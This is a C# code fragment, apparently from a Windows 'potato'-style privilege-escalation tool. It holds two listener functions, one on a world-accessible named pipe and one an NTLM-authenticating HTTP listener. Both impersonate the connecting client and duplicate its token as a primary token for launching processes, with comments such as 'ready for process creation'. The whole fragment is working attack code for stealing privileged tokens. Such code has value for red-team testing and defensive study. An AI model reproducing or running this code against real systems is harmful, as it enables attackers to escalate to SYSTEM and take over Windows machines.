void NamedPipeListener() { string hostName = System.Net.Dns.GetHostName(); byte[] data = new byte[4]; PipeSecurity ps = new PipeSecurity(); SecurityIdentifier sid = new SecurityIdentifier(WellKnownSidType.WorldSid, null); PipeAccessRule par = new PipeAccessRule(sid, PipeAccessRights.ReadWrite, System.Security.AccessControl.AccessControlType.Allow); ps.AddAccessRule(par); Console.WriteLine($"[+] Starting named pipe at \\\\{hostName}\\pipe\\test"); spoolPipe = new NamedPipeServerStream($"test", PipeDirection.InOut, 10, PipeTransmissionMode.Byte, PipeOptions.None, 2048, 2048, ps); readyEvent.Set(); spoolPipe.WaitForConnection(); Console.WriteLine("[+] Received connection to our named pipe"); spoolPipe.Read(data, 0, 4); spoolPipe.RunAsClient(() => { if (!ImpersonationToken.OpenThreadToken(ImpersonationToken.GetCurrentThread(), ImpersonationToken.TOKEN_ALL_ACCESS, false, out var tokenHandle)) { Console.WriteLine("[-] Failed to open thread token"); return; } if (!ImpersonationToken.DuplicateTokenEx(tokenHandle, ImpersonationToken.TOKEN_ALL_ACCESS, IntPtr.Zero, ImpersonationToken.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, ImpersonationToken.TOKEN_TYPE.TokenPrimary, out systemImpersonationToken)) { Console.WriteLine("[-] Failed to duplicate impersonation token"); return; } Console.WriteLine("[+] Duplicated impersonation token ready for process creation"); }); readyEvent.Set(); spoolPipe.Close(); }
void HTTPListener() { Console.WriteLine($"[+] Starting HTTP listener on port http://{host}:{port}"); HttpListener listener = new HttpListener(); listener.Prefixes.Add($"http://{host}:{port}/"); listener.Start(); listener.AuthenticationSchemes = AuthenticationSchemes.IntegratedWindowsAuthentication; listener.UnsafeConnectionNtlmAuthentication = true; listener.IgnoreWriteExceptions = true; readyEvent.Set(); HttpListenerContext context = listener.GetContext(); Console.WriteLine("Request for: " + context.Request.Url.LocalPath); Console.WriteLine("Client: " + context.User.Identity.Name); var identity = (System.Security.Principal.WindowsIdentity)context.User.Identity; using (System.Security.Principal.WindowsImpersonationContext wic = identity.Impersonate()) { if (!ImpersonationToken.OpenThreadToken(ImpersonationToken.GetCurrentThread(), ImpersonationToken.TOKEN_ALL_ACCESS, false, out var tokenHandle)) { Console.WriteLine("[-] Failed to open thread token"); return; } if (!ImpersonationToken.DuplicateTokenEx(tokenHandle, ImpersonationToken.TOKEN_ALL_ACCESS, IntPtr.Zero, ImpersonationToken.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, ImpersonationToken.TOKEN_TYPE.TokenPrimary, out systemImpersonationToken)) { Console.WriteLine("[-] Failed to duplicate impersonation token"); return; } Console.WriteLine("[+] Duplicated impersonation token ready for process creation"); } readyEvent.Set(); }